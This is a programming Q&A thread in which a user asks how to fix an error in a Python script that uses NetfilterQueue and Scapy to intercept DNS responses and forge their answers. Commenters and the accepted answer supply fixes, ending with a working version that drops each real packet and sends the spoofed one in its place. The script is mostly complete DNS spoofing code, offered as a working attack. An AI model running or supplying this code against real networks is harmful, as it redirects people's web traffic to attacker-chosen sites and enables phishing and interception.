# Netfilterqueue, Scapy set_payload

Tags: python-3.x, scapy, payload

I am trying to alter the payload of a packet using NetfilterQueue and Python3 however, I get the error:

> AttributeError: 'netfilterqueue.Packet' object has no attribute 'set_payload'

Below is the code I am using. How can I rectify the error?

```
import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = str(scapy_packet[scapy.DNSQR].qname)
        print(qname)
        if "<web_address>" in qname:
            print("[+] Spoofing target...")
            answer = scapy.DNSRR(rrname = qname, rdata = "<web_site>")
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].chksum
            del scapy_packet[scapy.UDP].len
            packet.set_payload(str(scapy_packet))
    packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0,process_packet)
queue.run()
```

Comment: What about ```packet.payload = Raw(str(scapy_packet))```?

Comment: @qouify , I tried your solution but I get the error : Exception NameError: "global name 'Raw' is not defined" in 'netfilterqueue.global_callback' ignored . Do you know how to solve this?

Comment: of course, my mistake. try ```scapy.Raw``` instead of just ```Raw```

Comment: @qouify , that solved that issue but now im getting the error : Exception AttributeError: "attribute 'payload' of 'netfilterqueue.Packet' objects is not writable" in 'netfilterqueue.global_callback' ignored

Answer (score 1, accepted):

I had the same issue, it seems netfilterqueue is kind of obsolete.
For your case i suggest you just drop by default the packets and instead of packet.accept() use scapy's send() function :

```
def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = str(scapy_packet[scapy.DNSQR].qname)
        print(qname)
        if "<web_address>" in qname:
            print("[+] Spoofing target...")
            answer = scapy.DNSRR(rrname = qname, rdata = "<web_site>")
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].chksum
            del scapy_packet[scapy.UDP].len



    packet.drop()
    send(scapy_packet)
```

Comment: Thank you so much! I'll try this out!